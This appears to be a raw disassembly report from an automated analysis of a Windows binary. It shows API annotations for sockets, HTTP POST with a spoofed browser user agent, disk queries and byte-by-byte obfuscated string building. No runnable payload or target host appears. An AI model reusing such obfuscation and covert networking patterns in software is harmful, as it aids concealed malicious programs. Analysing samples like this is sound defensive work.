00422279 imul edx, ebx, 5Bh
0042227C add edx, ebx
0042227E mov byte ptr [eax+01h], dl
00422281 mov byte ptr [eax], 00000001h
00422284 lea edx, dword ptr [ebp-000002ACh]
0042228A lea eax, dword ptr [ebp-000002B0h]
00422290 call 00402EFCh
00422295 lea eax, dword ptr [ebp-000002B4h]
0042229B mov edx, ebx
0042229D shl edx, 02h
004222A0 push edx
004222A1 mov edx, 00000077h
004222A6 pop ecx
004222A7 sub edx, ecx
004222A9 mov byte ptr [eax+01h], dl
004222AC mov byte ptr [eax], 00000001h
004222AF lea edx, dword ptr [ebp-000002B4h]
004222B5 lea eax, dword ptr [ebp-000002B0h]
004222BB mov cl, 02h
004222BD call 00402ECCh
004222C2 lea edx, dword ptr [ebp-000002B0h]
004222C8 lea eax, dword ptr [ebp-000002B8h]
004222CE call 00402EFCh
004222D3 lea eax, dword ptr [ebp-000002B4h]
004222D9 lea edx, dword ptr [ebx+4Bh]
004222DC mov byte ptr [eax+01h], dl
004222DF mov byte ptr [eax], 00000001h
004222E2 lea edx, dword ptr [ebp-000002B4h]
004222E8 lea eax, dword ptr [ebp-000002B8h]
004222EE mov cl, 03h
004222F0 call 00402ECCh
004222F5 lea edx, dword ptr [ebp-000002B8h]
004222FB lea eax, dword ptr [ebp-000002C0h]
00422301 call 00402EFCh
00422306 lea eax, dword ptr [ebp-000002B4h]
0042230C lea edx, dword ptr [ebx+ebx+52h]
00422310 mov byte ptr [eax+01h], dl
00422313 mov byte ptr [eax], 00000001h
00422316 lea edx, dword ptr [ebp-000002B4h]
0042231C lea eax, dword ptr [ebp-000002C0h]
00422322 mov cl, 04h
00422324 call 00402ECCh
00422329 lea edx, dword ptr [ebp-000002C0h]
0042232F lea eax, dword ptr [ebp-000002C8h]
00422335 call 00402EFCh
0042233A lea eax, dword ptr [ebp-000002B4h]
00422340 mov edx, ebx
00422342 add edx, edx
00422344 push edx
00422345 mov edx, 00000030h
0042234A pop ecx
0042234B sub edx, ecx
0042234D mov byte ptr [eax+01h], dl
00422350 mov byte ptr [eax], 00000001h
00422353 lea edx, dword ptr [ebp-000002B4h]
00422359 lea eax, dword ptr [ebp-000002C8h]
0042235F mov cl, 05h
00422361 call 00402ECCh
00422366 lea edx, dword ptr [ebp-000002C8h]
0042236C lea eax, dword ptr [ebp-000002D0h]
00422372 call 00402EFCh
00422377 lea eax, dword ptr [ebp-000002B4h]
0042237D lea edx, dword ptr [ebx+64h]
00422380 mov byte ptr [eax+01h], dl
00422383 mov byte ptr [eax], 00000001h
00422386 lea edx, dword ptr [ebp-000002B4h]
0042238C lea eax, dword ptr [ebp-000002D0h]
00422392 mov cl, 06h
00422394 call 00402ECCh
00422399 lea edx, dword ptr [ebp-000002D0h]
0042239F lea eax, dword ptr [ebp-000002D8h]
004223A5 call 00402EFCh
004223AA lea eax, dword ptr [ebp-000002B4h]
004223B0 mov edx, ebx
004223B2 add edx, edx
004223B4 add edx, 76h
004223B7 mov byte ptr [eax+01h], dl
004223BA mov byte ptr [eax], 00000001h
004223BD lea edx, dword ptr [ebp-000002B4h]
004223C3 lea eax, dword ptr [ebp-000002D8h]
004223C9 mov cl, 07h
004223CB call 00402ECCh
004223D0 lea edx, dword ptr [ebp-000002D8h]
004223D6 lea eax, dword ptr [ebp-000002E4h]
004223DC call 00402EFCh
004223E1 lea eax, dword ptr [ebp-000002B4h]
004223E7 imul edx, ebx, 0Bh
004223EA add edx, 5Bh
004223ED mov byte ptr [eax+01h], dl
004223F0 mov byte ptr [eax], 00000001h
004223F3 lea edx, dword ptr [ebp-000002B4h]
004223F9 lea eax, dword ptr [ebp-000002E4h]
004223FF mov cl, 08h
00422401 call 00402ECCh
00422406 lea edx, dword ptr [ebp-000002E4h]
0042240C lea eax, dword ptr [ebp-000002F4h]
00422412 call 00404640h
00422417 mov edx, dword ptr [ebp-000002F4h]
0042241D pop eax
0042241E call 00404680h
00422423 mov edx, dword ptr [ebp-000002F0h]
00422429 lea eax, dword ptr [ebp-00000154h]
0042242F call 00402CDCh
00422434 mov edx, 00000001h
00422439 lea eax, dword ptr [ebp-00000154h]
0042243F call 00403174h
00422444 call 004027F0h
00422449 mov eax, esi
0042244B call 004043DCh
00422450 jmp 00422487h
00422452 push 00000000h xrefs 00422499
00422454 lea edx, dword ptr [ebp-05h]
00422457 mov ecx, 00000001h
0042245C lea eax, dword ptr [ebp-00000154h]
00422462 call 00402E34h
00422467 call 004027F0h
0042246C lea eax, dword ptr [ebp-000002F8h]
00422472 mov dl, byte ptr [ebp-05h]
00422475 call 004045C4h
0042247A mov edx, dword ptr [ebp-000002F8h]
00422480 mov eax, esi
00422482 call 00404680h
00422487 lea eax, dword ptr [ebp-00000154h] xrefs 00422450
0042248D call 00402F78h
00422492 call 004027F0h
00422497 test al, al
00422499 je 00422452h
0042249B lea eax, dword ptr [ebp-00000154h]
004224A1 call 00402E74h
004224A6 call 004027F0h
004224AB xor eax, eax xrefs 00422258
004224AD pop edx
004224AF pop ecx Count = 2
004224B0 mov dword ptr fs:[eax], edx
004224B3 jmp 004224BFh
004224BF xor eax, eax xrefs 004224B3
004224C1 pop edx
004224C3 pop ecx Count = 2
004224C4 mov dword ptr fs:[eax], edx
004224C7 push 004224FCh
004224CC lea eax, dword ptr [ebp-000002F8h] xrefs 004224FA
004224D2 mov edx, 00000005h
004224D7 call 00404400h
004224DC lea eax, dword ptr [ebp-000002A8h]
004224E2 mov edx, 00000002h
004224E7 call 00404400h
004224EC lea eax, dword ptr [ebp-04h]
004224EF call 004043DCh
004224F4 ret function end
Address Instruction Meta Information
00407978 push ebx xrefs 00422000, 00429E90
00407979 mov ebx, eax
0040797B mov eax, ebx
0040797D call 00407910h
00407982 inc eax
00407983 setne al
00407986 pop ebx
00407987 ret function end
APIs
  • GetDiskFreeSpaceA.KERNEL32, ref: 00407A6D
Address Instruction Meta Information
00407A4C push ebp
00407A4D mov ebp, esp
00407A4F add esp, FFFFFFE8h
00407A52 push ebx
00407A53 mov eax, dword ptr [ebp+08h]
00407A56 test eax, eax
00407A58 jne 00407A5Ch
00407A5A xor eax, eax
00407A5C lea edx, dword ptr [ebp-10h] xrefs 00407A58
00407A5F push edx
00407A60 lea edx, dword ptr [ebp-0Ch]
00407A63 push edx
00407A64 lea edx, dword ptr [ebp-08h]
00407A67 push edx
00407A68 lea edx, dword ptr [ebp-04h]
00407A6B push edx
00407A6C push eax
00407A6D call 00406194h GetDiskFreeSpaceA@KERNEL32.DLL (Hidden Import)
00407A72 mov ebx, eax
00407A74 mov eax, dword ptr [ebp-04h]
00407A77 imul dword ptr [ebp-08h]
00407A7A xor edx, edx
00407A7C mov dword ptr [ebp-18h], eax
00407A7F mov dword ptr [ebp-14h], edx
00407A82 mov eax, dword ptr [ebp-0Ch]
00407A85 xor edx, edx
00407A87 push edx
00407A88 push eax
00407A89 mov eax, dword ptr [ebp-18h]
00407A8C mov edx, dword ptr [ebp-14h]
00407A8F call 00405068h
00407A94 mov ecx, dword ptr [ebp+0Ch]
00407A97 mov dword ptr [ecx], eax
00407A99 mov dword ptr [ecx+04h], edx
00407A9C mov eax, dword ptr [ebp-10h]
00407A9F xor edx, edx
00407AA1 push edx
00407AA2 push eax
00407AA3 mov eax, dword ptr [ebp-18h]
00407AA6 mov edx, dword ptr [ebp-14h]
00407AA9 call 00405068h
00407AAE mov ecx, dword ptr [ebp+10h]
00407AB1 mov dword ptr [ecx], eax
00407AB3 mov dword ptr [ecx+04h], edx
00407AB6 mov eax, ebx
00407AB8 pop ebx
00407AB9 mov esp, ebp
00407ABB pop ebp
00407ABC retn 0010h function end
Address Instruction Meta Information
00418890 push ebp
00418891 mov ebp, esp
00418893 push ecx
00418894 push ebx
00418895 push esi
00418896 mov dword ptr [ebp-04h], edx
00418899 mov ebx, eax
0041889B mov eax, dword ptr [ebp-04h]
0041889E call 00404868h
004188A3 xor eax, eax
004188A5 push ebp
004188A6 push 004188DDh
004188AB push dword ptr fs:[eax]
004188AE mov dword ptr fs:[eax], esp
004188B1 mov esi, dword ptr [ebp-04h]
004188B4 mov eax, dword ptr [ebp-04h]
004188B7 call 00404678h
004188BC mov ecx, eax
004188BE mov edx, esi
004188C0 mov eax, ebx
004188C2 mov ebx, dword ptr [eax]
004188C4 call dword ptr [ebx+1Ch]
004188C7 xor eax, eax
004188C9 pop edx
004188CB pop ecx Count = 2
004188CC mov dword ptr fs:[eax], edx
004188CF push 004188E4h
004188D4 lea eax, dword ptr [ebp-04h] xrefs 004188E2
004188D7 call 004043DCh
004188DC ret function end
APIs
  • send.WS2_32, ref: 00413AE3
Address Instruction Meta Information
00413AD8 push ebp xrefs 004187BD, 004187FA
00413AD9 mov ebp, esp
00413ADB push ebx
00413ADC mov ebx, dword ptr [ebp+08h]
00413ADF push ebx
00413AE0 push ecx
00413AE1 push edx
00413AE2 push eax
00413AE3 call dword ptr [0042B400h] send@WS2_32.DLL (Hidden Import)
00413AE9 pop ebx
00413AEA pop ebp
00413AEB retn 0004h function end
Strings
  • p B, va: 00420924
Address Instruction Meta Information
00421A91 sub eax, 0042CA94h
00421A96 add dword ptr [ebx+16h], esi
00421A99 call 0041F43Ch
00421A9E test al, al
00421AA0 je 00421AAFh
00421AA2 mov eax, dword ptr [0042B97Ch] 0042B5D8
00421AA7 mov edx, dword ptr [00420924h] ASCII "p B"
00421AAD mov dword ptr [eax], edx
00421AAF ret xrefs 00421AA0 function end
APIs
  • RtlDeleteCriticalSection.NTDLL, ref: 0040F4A3
Address Instruction Meta Information
0040F480 push ebp
0040F481 mov ebp, esp
0040F483 xor eax, eax
0040F485 push ebp
0040F486 push 0040F4EFh
0040F48B push dword ptr fs:[eax]
0040F48E mov dword ptr fs:[eax], esp
0040F491 inc dword ptr [0042C818h]
0040F497 jne 0040F4E1h
0040F499 call 0040F124h
0040F49E push 0042C820h
0040F4A3 call 00406114h RtlDeleteCriticalSection@NTDLL.DLL (Hidden Import)
0040F4A8 mov eax, 0042C81Ch
0040F4AD mov edx, dword ptr [0040F100h] 0040F104
0040F4B3 call 00405254h
0040F4B8 mov eax, 0042B348h
0040F4BD mov ecx, 00000015h
0040F4C2 mov edx, dword ptr [00401040h] 00401044
0040F4C8 call 00404D40h
0040F4CD mov eax, 0042B33Ch
0040F4D2 call 004043DCh
0040F4D7 mov eax, 0042C7F8h
0040F4DC call 0040DB20h
0040F4E1 xor eax, eax xrefs 0040F497
0040F4E3 pop edx
0040F4E5 pop ecx Count = 2
0040F4E6 mov dword ptr fs:[eax], edx
0040F4E9 push 0040F4F6h
0040F4EE ret xrefs 0040F4F4 function end
Address Instruction Meta Information
0040C4E0 push ebp
0040C4E1 mov ebp, esp
0040C4E3 xor eax, eax
0040C4E5 push ebp
0040C4E6 push 0040C548h
0040C4EB push dword ptr fs:[eax]
0040C4EE mov dword ptr fs:[eax], esp
0040C4F1 sub dword ptr [0042C788h], 01h
0040C4F8 jnc 0040C53Ah
0040C4FA mov eax, 0040C090h
0040C4FF call 00404104h
0040C504 mov eax, 0040C17Ch
0040C509 call 0040412Ch
0040C50E cmp byte ptr [0042C65Dh], 00000000h
0040C515 je 0040C526h
0040C517 mov eax, 0042B150h
0040C51C mov edx, 0040C55Ch
0040C521 call 00404430h
0040C526 call 0040AF84h xrefs 0040C515
0040C52B call 0040B088h
0040C530 call 0040BC0Ch
0040C535 call 0040B7C0h
0040C53A xor eax, eax xrefs 0040C4F8
0040C53C pop edx
0040C53E pop ecx Count = 2
0040C53F mov dword ptr fs:[eax], edx
0040C542 push 0040C54Fh
0040C547 ret xrefs 0040C54D function end
APIs
  • bind.WS2_32, ref: 004139E8
Address Instruction Meta Information
004139D8 push ebx xrefs 0041840F
004139D9 push esi
004139DA mov ebx, edx
004139DC mov esi, eax
004139DE mov eax, ebx
004139E0 call 0041399Ch
004139E5 push eax
004139E6 push ebx
004139E7 push esi
004139E8 call dword ptr [0042B43Ch] bind@WS2_32.DLL (Hidden Import)
004139EE pop esi
004139EF pop ebx
004139F0 ret function end
Address Instruction Meta Information
0041803C push ebp xrefs 004183E5, 004184F6
0041803D mov ebp, esp
00418047 push 00000000h Count = 5
00418049 push ebx
0041804A push esi
0041804B push edi
0041804C mov dword ptr [ebp-04h], ecx
0041804F mov esi, edx
00418051 mov edi, eax
00418053 mov eax, dword ptr [ebp-04h]
00418056 call 00404868h
0041805B mov eax, dword ptr [ebp+08h]
0041805E call 00404868h
00418063 xor eax, eax
00418065 push ebp
00418066 push 00418174h
0041806B push dword ptr fs:[eax]
0041806E mov dword ptr fs:[eax], esp
00418071 push dword ptr [ebp-04h]
00418074 push 0041818Ch
00418079 push dword ptr [ebp+08h]
0041807C lea eax, dword ptr [ebp-08h]
0041807F mov edx, 00000003h
00418084 call 00404738h
00418089 mov ecx, dword ptr [ebp-08h]
0041808C xor edx, edx
0041808E mov eax, edi
00418090 call 00419E70h
00418095 mov eax, edi
00418097 call 0041949Ch
0041809C xor ebx, ebx
0041809E cmp dword ptr [edi+000001B4h], FFFFFFFFh
004180A5 jne 004180D0h
004180A7 cmp byte ptr [edi+0000008Ch], 00000000h
004180AE jne 004180D0h
004180B0 mov eax, dword ptr [ebp-04h]
004180B3 call 00415F18h
004180B8 test al, al
004180BA je 004180C0h
004180BC mov bl, 01h
004180BE jmp 004180D6h
004180C0 mov eax, dword ptr [ebp-04h] xrefs 004180BA
004180C3 call 00415FD8h
004180C8 test al, al
004180CA je 004180D6h
004180CC mov bl, 02h
004180CE jmp 004180D6h
004180D0 mov bl, byte ptr [edi+0000008Ch] xrefs 004180A5, 004180AE
004180D6 mov edx, ebx xrefs 004180CA, 004180CE, 004180BE
004180D8 mov eax, edi
004180DA call 00417D4Ch
004180DF push eax
004180E0 mov eax, edi
004180E2 mov edx, dword ptr [eax]
004180E4 call dword ptr [edx+000000A4h]
004180EA push eax
004180EB mov eax, edi
004180ED mov edx, dword ptr [eax]
004180EF call dword ptr [edx+000000A0h]
004180F5 push eax
004180F6 mov al, byte ptr [edi+0000008Fh]
004180FC push eax
004180FD mov eax, esi
004180FF mov ecx, dword ptr [ebp+08h]
00418102 mov edx, dword ptr [ebp-04h]
00418105 call 00413D24h
0041810A mov dword ptr [edi+000001B8h], eax
00418110 lea ecx, dword ptr [ebp-10h]
00418113 mov edx, esi
00418115 mov eax, edi
00418117 call 00418190h
0041811C push dword ptr [ebp-10h]
0041811F push 0041818Ch
00418124 mov edx, esi
00418126 mov eax, edi
00418128 call 004181B8h
0041812D lea edx, dword ptr [ebp-14h]
00418130 call 004074CCh
00418135 push dword ptr [ebp-14h]
00418138 lea eax, dword ptr [ebp-0Ch]
0041813B mov edx, 00000003h
00418140 call 00404738h
00418145 mov ecx, dword ptr [ebp-0Ch]
00418148 mov dl, 01h
0041814A mov eax, edi
0041814C call 00419E70h
00418151 xor eax, eax
00418153 pop edx
00418155 pop ecx Count = 2
00418156 mov dword ptr fs:[eax], edx
00418159 push 0041817Bh
0041815E lea eax, dword ptr [ebp-14h] xrefs 00418179
00418161 mov edx, 00000005h
00418166 call 00404400h
0041816B lea eax, dword ptr [ebp+08h]
0041816E call 004043DCh
00418173 ret function end
APIs
  • WideCharToMultiByte.KERNEL32, ref: 00404512
Address Instruction Meta Information
004044FC push ebp xrefs 004045A3, 00404573
004044FD mov ebp, esp
00404501 push 00000000h Count = 2
00404503 push edx
00404504 push eax
00404505 mov eax, dword ptr [ebp+08h]
00404508 push eax
00404509 push ecx
0040450A push 00000000h
0040450C mov eax, dword ptr [0042C5B8h] 00000003
00404511 push eax
00404512 call 004012C0h WideCharToMultiByte@KERNEL32.DLL (Hidden Import)
00404517 pop ebp
00404518 retn 0004h function end
Address Instruction Meta Information
00422504 push ebp xrefs 00429A73
00422505 mov ebp, esp
00422507 push 00000000h
00422509 xor eax, eax
0042250B push ebp
0042250C push 00422569h
00422511 push dword ptr fs:[eax]
00422514 mov dword ptr fs:[eax], esp
00422517 lea eax, dword ptr [ebp-04h]
0042251A call 00421DD8h
0042251F mov edx, dword ptr [ebp-04h]
00422522 mov eax, 0042DA84h
00422527 call 00404430h
0042252C xor ecx, ecx
0042252E mov dl, 01h
00422530 mov eax, dword ptr [00421AB0h] 00421AFC
00422535 call 00413184h
0042253A mov dword ptr [0042CAC4h], eax
0042253F mov eax, dword ptr [0042CAC4h] 009620F4
00422544 call 004134ECh
00422549 mov eax, dword ptr [0042CAC4h] 009620F4
0042254E call 0041351Ch
00422553 xor eax, eax
00422555 pop edx
00422557 pop ecx Count = 2
00422558 mov dword ptr fs:[eax], edx
0042255B push 00422570h
00422560 lea eax, dword ptr [ebp-04h] xrefs 0042256E
00422563 call 004043DCh
00422568 ret function end
APIs
  • recv.WS2_32, ref: 00413AFB
Address Instruction Meta Information
00413AF0 push ebp xrefs 00418B17, 004193F4
00413AF1 mov ebp, esp
00413AF3 push ebx
00413AF4 mov ebx, dword ptr [ebp+08h]
00413AF7 push ebx
00413AF8 push ecx
00413AF9 push edx
00413AFA push eax
00413AFB call dword ptr [0042B404h] recv@WS2_32.DLL (Hidden Import)
00413B01 pop ebx
00413B02 pop ebp
00413B03 retn 0004h function end
Strings
  • application/x-www-form-urlencoded, va: 00429190
  • Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US), va: 004291BC
Address Instruction Meta Information
00429030 push ebp xrefs 00429285
00429031 mov ebp, esp
00429033 add esp, FFFFFFE8h
00429036 push ebx
00429037 push esi
00429038 push edi
00429039 xor ecx, ecx
0042903B mov dword ptr [ebp-18h], ecx
0042903E mov dword ptr [ebp-14h], ecx
00429041 mov dword ptr [ebp-08h], edx
00429044 mov dword ptr [ebp-04h], eax
00429047 mov eax, dword ptr [ebp-04h]
0042904A call 00404868h
0042904F xor eax, eax
00429051 push ebp
00429052 push 0042916Bh
00429057 push dword ptr fs:[eax]
0042905A mov dword ptr fs:[eax], esp
0042905D mov dl, 01h
0042905F mov eax, dword ptr [0040FD08h] 0040FD54
00429064 call 004036D8h
00429069 mov dword ptr [ebp-10h], eax
0042906C mov dl, 01h
0042906E mov eax, dword ptr [0041C8D0h] 0041C91C
00429073 call 0041CCB0h
00429078 mov dword ptr [ebp-0Ch], eax
0042907B xor eax, eax
0042907D push ebp
0042907E push 00429121h
00429083 push dword ptr fs:[eax]
00429086 mov dword ptr fs:[eax], esp
00429089 mov eax, dword ptr [ebp-0Ch]
0042908C mov eax, dword ptr [eax+1Ch]
0042908F mov dword ptr [eax+000001C8h], 00001388h
00429099 lea eax, dword ptr [ebp-14h]
0042909C mov ecx, dword ptr [0042DA84h] 009620CC
004290A2 mov edx, 00429184h
004290A7 call 004046C4h
004290AC mov eax, dword ptr [ebp-14h]
004290AF call 00404678h
004290B4 push eax
004290B5 lea eax, dword ptr [ebp-18h]
004290B8 mov ecx, dword ptr [0042DA84h] 009620CC
004290BE mov edx, 00429184h
004290C3 call 004046C4h
004290C8 mov edx, dword ptr [ebp-18h]
004290CB mov eax, dword ptr [ebp-0Ch]
004290CE mov eax, dword ptr [eax+30h]
004290D1 pop ecx
004290D2 mov ebx, dword ptr [eax]
004290D4 call dword ptr [ebx+10h]
004290D7 mov eax, dword ptr [ebp-0Ch]
004290DA add eax, 34h
004290DD mov edx, 00429190h ASCII "application/x-www-form-urlencoded"
004290E2 call 00404430h
004290E7 mov eax, dword ptr [ebp-0Ch]
004290EA add eax, 60h
004290ED mov edx, 004291BCh ASCII "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)"
004290F2 call 00404430h
004290F7 push 00000001h
004290F9 mov ecx, dword ptr [ebp-04h]
004290FC mov edx, 004291F4h
00429101 mov eax, dword ptr [ebp-0Ch]
00429104 call 0041D0E8h
00429109 mov eax, dword ptr [ebp-0Ch]
0042910C mov edx, dword ptr [eax+30h]
0042910F mov eax, dword ptr [ebp-10h]
00429112 mov ecx, dword ptr [eax]
00429114 call dword ptr [ecx+6Ch]
00429117 xor eax, eax
00429119 pop edx
0042911B pop ecx Count = 2
0042911C mov dword ptr fs:[eax], edx
0042911F jmp 0042912Bh
0042912B mov dl, 01h xrefs 0042911F
0042912D mov eax, dword ptr [ebp-0Ch]
00429130 mov ecx, dword ptr [eax]
00429132 call dword ptr [ecx-04h]
00429135 mov edx, dword ptr [ebp-08h]
00429138 mov eax, dword ptr [ebp-10h]
0042913B mov ecx, dword ptr [eax]
0042913D call dword ptr [ecx+1Ch]
00429140 mov eax, dword ptr [ebp-10h]
00429143 call 00403708h
00429148 xor eax, eax
0042914A pop edx
0042914C pop ecx Count = 2
0042914D mov dword ptr fs:[eax], edx
00429150 push 00429172h
00429155 lea eax, dword ptr [ebp-18h] xrefs 00429170
00429158 mov edx, 00000002h
0042915D call 00404400h
00429162 lea eax, dword ptr [ebp-04h]
00429165 call 004043DCh
0042916A ret function end
APIs
    • InterlockedExchange.KERNEL32, ref: 00412FB7
  • PeekMessageA.USER32, ref: 00413556
  • MsgWaitForMultipleObjects.USER32, ref: 0041356B
  • GetExitCodeThread.KERNEL32, ref: 004135A3
Address Instruction Meta Information
0041351C push ebx xrefs 0042254E, 00413281
0041351D push esi
0041351E add esp, FFFFFFD8h
00413521 mov esi, eax
00413523 mov eax, dword ptr [esi+04h]
00413526 mov dword ptr [esp+04h], eax
0041352A call 00406184h
0041352F mov edx, dword ptr [0042B984h] 0042C030
00413535 cmp eax, dword ptr [edx]
00413537 jne 00413591h
00413539 xor ebx, ebx
0041353B mov eax, dword ptr [0042C848h] 00000048
00413540 mov dword ptr [esp+08h], eax
00413544 cmp ebx, 02h xrefs 0041358D
00413547 jne 0041355Bh
0041354F push 00000000h Count = 4
00413551 lea eax, dword ptr [esp+1Ch]
00413555 push eax
00413556 call 004062DCh PeekMessageA@USER32.DLL (Hidden Import)
0041355B push 00000040h xrefs 00413547
0041355D push 000003E8h
00413562 push 00000000h
00413564 lea eax, dword ptr [esp+10h]
00413568 push eax
00413569 push 00000002h
0041356B call 004062D4h MsgWaitForMultipleObjects@USER32.DLL (Hidden Import)
00413570 mov ebx, eax
00413572 cmp ebx, FFFFFFFFh
00413575 setne dl
00413578 mov eax, esi
0041357A call 00413344h
0041357F cmp ebx, 01h
00413582 jne 0041358Bh
00413584 xor eax, eax
00413586 call 00412F3Ch
0041358B test ebx, ebx xrefs 00413582
0041358D jne 00413544h
0041358F jmp 0041359Dh
00413591 push FFFFFFFFh xrefs 00413537
00413593 mov eax, dword ptr [esp+08h]
00413597 push eax
00413598 call 0040629Ch
0041359D push esp xrefs 0041358F
0041359E mov eax, dword ptr [esp+08h]
004135A2 push eax
004135A3 call 0040619Ch GetExitCodeThread@KERNEL32.DLL (Hidden Import)
004135A8 cmp eax, 01h
004135AB sbb edx, edx
004135AD inc edx
004135AE mov eax, esi
004135B0 call 00413344h
004135B5 mov eax, dword ptr [esp]
004135B8 add esp, 28h
004135BB pop esi
004135BC pop ebx
004135BD ret function end
APIs
  • SetFilePointer.KERNEL32, ref: 00402FB1
Address Instruction Meta Information
00402F94 push ebx xrefs 00402F7E
00402F95 push esi
00402F96 mov ebx, eax
00402F98 mov ax, word ptr [ebx+04h]
00402F9C cmp ax, 0000D7B0h
00402FA0 jbe 00402FCFh
00402FA2 cmp ax, 0000D7B3h
00402FA6 jnbe 00402FCFh
00402FA8 push 00000001h
00402FAC push 00000000h Count = 2
00402FAE mov eax, dword ptr [ebx]
00402FB0 push eax
00402FB1 call 004011E8h SetFilePointer@KERNEL32.DLL (Hidden Import)
00402FB6 mov esi, eax
00402FB8 cmp esi, FFFFFFFFh
00402FBB jne 00402FC4h
00402FBD call 00402820h
00402FC2 jmp 00402FDCh
00402FC4 mov eax, esi xrefs 00402FBB
00402FC6 xor edx, edx
00402FC8 div dword ptr [ebx+08h]
00402FCB mov esi, eax
00402FCD jmp 00402FDCh
00402FCF mov eax, 00000067h xrefs 00402FA0, 00402FA6
00402FD4 call 00402810h
00402FD9 or esi, FFFFFFFFh
00402FDC mov eax, esi xrefs 00402FCD, 00402FC2
00402FDE pop esi
00402FDF pop ebx
00402FE0 ret function end
APIs
  • VirtualQuery.KERNEL32, ref: 004052C3
Address Instruction Meta Information
004052B8 add esp, FFFFFFE4h xrefs 00410318
004052BB push 0000001Ch
004052BD lea edx, dword ptr [esp+04h]
004052C1 push edx
004052C2 push eax
004052C3 call 004012C8h VirtualQuery@KERNEL32.DLL (Hidden Import)
004052C8 cmp dword ptr [esp+10h], 00001000h
004052D0 jne 004052D8h
004052D2 mov eax, dword ptr [esp+04h]
004052D6 jmp 004052DAh
004052D8 xor eax, eax xrefs 004052D0
004052DA add esp, 1Ch xrefs 004052D6
004052DD ret function end
APIs
  • FreeLibrary.KERNEL32, ref: 004042ED
    • GetStdHandle.KERNEL32, ref: 00404215
    • WriteFile.KERNEL32, ref: 0040421B
    • MessageBoxA.USER32, ref: 00404254
  • ExitProcess.KERNEL32, ref: 00404322
Address Instruction Meta Information
00404268 push ebx xrefs 00404345
00404269 push esi
0040426A push edi
0040426B push ebp
0040426C mov ebx, 0042C630h
00404271 mov esi, 0042B000h
00404276 mov edi, 0042C040h
0040427B cmp byte ptr [ebx+28h], 00000000h
0040427F jne 00404297h
00404281 cmp dword ptr [edi], 00000000h
00404284 je 00404297h
00404286 mov edx, dword ptr [edi] xrefs 00404295
00404288 mov eax, edx
0040428A xor edx, edx
0040428C mov dword ptr [edi], edx
0040428E mov ebp, eax
00404290 call ebp
00404292 cmp dword ptr [edi], 00000000h
00404295 jne 00404286h
00404297 cmp dword ptr [0042B004h], 00000000h xrefs 0040427F, 00404284
0040429E je 004042B1h
004042A0 call 00404150h
004042A5 call 004041DCh
004042AA xor eax, eax
004042AC mov dword ptr [0042B004h], eax
004042B1 cmp byte ptr [ebx+28h], 00000002h xrefs 0040429E, 00404336
004042B5 jne 004042C1h
004042B7 cmp dword ptr [esi], 00000000h
004042BA jne 004042C1h
004042BC xor eax, eax
004042BE mov dword ptr [ebx+0Ch], eax
004042C1 call 00404004h xrefs 004042B5, 004042BA
004042C6 cmp byte ptr [ebx+28h], 00000001h
004042CA jbe 004042D1h
004042CC cmp dword ptr [esi], 00000000h
004042CF je 004042F2h
004042D1 mov eax, dword ptr [ebx+10h] xrefs 004042CA
004042D4 test eax, eax
004042D6 je 004042F2h
004042D8 call 00405888h
004042DD mov edx, dword ptr [ebx+10h]
004042E0 mov eax, dword ptr [edx+10h]
004042E3 cmp eax, dword ptr [edx+04h]
004042E6 je 004042F2h
004042E8 test eax, eax
004042EA je 004042F2h
004042EC push eax
004042ED call 00401238h FreeLibrary@KERNEL32.DLL (Hidden Import)
004042F2 call 00403FDCh xrefs 004042D6, 004042CF, 004042E6, 004042EA
004042F7 cmp byte ptr [ebx+28h], 00000001h
004042FB jne 00404300h
004042FD call dword ptr [ebx+24h]
00404300 cmp byte ptr [ebx+28h], 00000000h xrefs 004042FB
00404304 je 0040430Bh
00404306 call 004041ACh
0040430B cmp dword ptr [ebx], 00000000h xrefs 00404304
0040430E jne 00404327h
00404310 cmp dword ptr [0042C024h], 00000000h
00404317 je 0040431Fh
00404319 call dword ptr [0042C024h]
0040431F mov eax, dword ptr [esi] xrefs 00404317
00404321 push eax
00404322 call 00401218h ExitProcess@KERNEL32.DLL (Import)
00404327 mov eax, dword ptr [ebx] xrefs 0040430E
00404329 push esi
0040432A mov esi, eax
0040432C mov edi, ebx
0040432E mov ecx, 0000000Bh
00404333 rep movsd
00404335 pop esi
00404336 jmp 004042B1h
APIs
  • closesocket.WS2_32, ref: 00418313
Address Instruction Meta Information
004182FC push ebx
004182FD push esi
004182FE mov esi, eax
00418300 mov eax, dword ptr [esi+000001B4h]
00418306 cmp eax, FFFFFFFFh
00418309 je 00418315h
0041830B push eax
0041830C mov eax, dword ptr [0042B958h] 0042B438
00418311 mov eax, dword ptr [eax]
00418313 call eax closesocket@WS2_32.DLL (Hidden Import)
00418315 mov dword ptr [esi+000001B4h], FFFFFFFFh xrefs 00418309
0041831F mov eax, dword ptr [esi+00000090h]
00418325 mov ebx, dword ptr [eax+08h]
00418328 dec ebx
00418329 cmp ebx, 00000000h
0041832C jl 00418346h
0041832E mov edx, ebx xrefs 00418344
00418330 mov eax, dword ptr [esi+00000090h]
00418336 call 004106B0h
0041833B call 00403708h
00418340 dec ebx
00418341 cmp ebx, FFFFFFFFh
00418344 jne 0041832Eh
00418346 mov eax, dword ptr [esi+00000090h] xrefs 0041832C
0041834C mov edx, dword ptr [eax]
0041834E call dword ptr [edx+08h]
00418351 mov al, byte ptr [esi+0000008Dh]
00418357 mov byte ptr [esi+0000008Ch], al
0041835D xor ecx, ecx
0041835F mov dl, 03h
00418361 mov eax, esi
00418363 call 00419E70h
00418368 pop esi
00418369 pop ebx
0041836A ret function end
APIs
    • SetEvent.KERNEL32, ref: 00412F1E
  • CreateEventA.KERNEL32, ref: 004133B3
Address Instruction Meta Information
00413384 push ebp xrefs 004134E0
00413385 mov ebp, esp
00413387 add esp, FFFFFFF4h
0041338A push ebx
0041338B mov dword ptr [ebp-04h], edx
0041338E call 00406184h
00413393 mov edx, dword ptr [0042B984h] 0042C030
00413399 cmp eax, dword ptr [edx]
0041339B jne 004133ABh
0041339D mov ebx, dword ptr [ebp-04h]
004133A0 mov eax, dword ptr [ebx+0Ch]
004133A3 call dword ptr [ebx+08h]
004133A6 jmp 004134BEh
004133AD push 00000000h Count = 2
004133AF push FFFFFFFFh
004133B1 push 00000000h
004133B3 call 00406104h CreateEventA@KERNEL32.DLL (Hidden Import)
004133B8 mov dword ptr [ebp-08h], eax
004133BB xor eax, eax
004133BD push ebp
004133BE push 004134A6h
004133C3 push dword ptr fs:[eax]
004133C6 mov dword ptr fs:[eax], esp
004133C9 push 0042C860h
004133CE call 0040611Ch
004133D3 xor eax, eax
004133D5 push ebp
004133D6 push 00413488h
